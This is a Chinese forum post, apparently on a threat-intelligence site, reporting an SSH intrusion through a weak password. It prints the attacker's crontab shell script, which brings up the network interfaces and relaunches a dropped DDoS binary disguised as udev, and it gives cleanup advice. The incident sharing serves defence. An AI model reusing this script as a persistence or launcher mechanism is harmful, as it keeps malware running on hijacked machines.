我被攻击了 入侵
ssh 入侵发包样本及解决方案
匿名用户 2020-06-18 18:31:50 529人浏览
#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
cp /lib/udev/udev /lib/udev/debug
/lib/udev/debug

客户机使用弱密码, 被入侵后下载文件 "udev", 之后将上面的脚本加入 crontab 运行.
临时解决方案是删除 cron 条目后 chattr +i /boot. 永久解决建议重装.

Hash(1) 检测结果 关联样本 微步标签 免费 全部 < 1/1 >
Vision视觉 2020-08-07 16:19:53 回复
个人安全意识不足
匿名用户 2020-06-18 19:12:19 回复
ddos